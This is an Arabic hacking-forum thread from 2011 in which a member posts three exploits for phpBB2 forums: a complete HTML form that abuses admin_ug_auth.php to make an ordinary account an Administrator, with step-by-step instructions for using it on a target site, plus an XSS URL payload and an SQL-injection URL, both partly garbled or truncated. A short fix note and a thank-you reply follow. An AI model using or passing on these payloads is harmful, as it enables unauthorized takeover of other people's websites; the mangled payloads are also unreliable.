‏¨ ¨°•√♥ قانون الهكر لا يحمي المغفلين ♥√•°‏¨
أهلاًوسهلاً
في
¨°•√♥️منتدى متعب الشويمان ♥️√•°‏¨
أتمنى لكم المتعه والفائده

‏¨ ¨°•√♥ قانون الهكر لا يحمي المغفلين ♥√•°‏¨


 
الرئيسيةاليوميةمكتبة الصورس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول

شاطر | 
 

 ثغرة في منتديات phpbb

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
chabazik



عدد المساهمات : 6
تاريخ التسجيل : 17/05/2011

مُساهمةموضوع: ثغرة في منتديات phpbb    الثلاثاء مايو 17, 2011 9:41 pm

ثغرة في منتديات phpbb



شلون الشباب ثغرة بمنتديات phpbb


ثغرة خطيرة جدأ في منتدى من نوع
PhpBB2

في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها
شفرة
<html>
<head>
</head>
<body>

<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>



عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory
اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك

الحل موجود هنا :
1- اذا كنت مصمم ماتبي غيرهالمنتدى يجب ان تحدث نسختك الى اخر اصدار وهو 2.0.3
2- أنصحك بالأنتقال الى منتدى Invision Board
وزاجل ماقصر نزل تعاريب للمنتدى منتدى حلو وقوي
بس عيبه الهاكات صعب تركيب الهاكات :rolleyes

::::::::
الثغرة رقم2
الاصدر المصاب هو Powered by phpBB 2.0.6

كل ما عليك تطبق الكود
http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe<script>document.write(document.&@#&@#&@#&@ #&@#&@#);</script>&category_rows[0][cat_order]=99

الثغرة رقم 3

الاصدر المصاب هو Powered by phpBB 2.0.9

كل ما عليك هو تطبق هذا الكود

http://www.xxxxx.com/privmsg.php?fol...%20LIMIT%201/*
منقول

الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
xxMUTEBxx
Admin
avatar

عدد المساهمات : 178
تاريخ التسجيل : 30/04/2011
العمر : 32

مُساهمةموضوع: رد: ثغرة في منتديات phpbb    الأربعاء مايو 18, 2011 6:52 pm

مشكووووووووووووووووووووووووور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://muteb.forumarabia.com
 
ثغرة في منتديات phpbb
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
‏¨ ¨°•√♥ قانون الهكر لا يحمي المغفلين ♥√•°‏¨ :: برامج هكر :: قسم الشرح والدروس الخاصه بالهكر-
انتقل الى: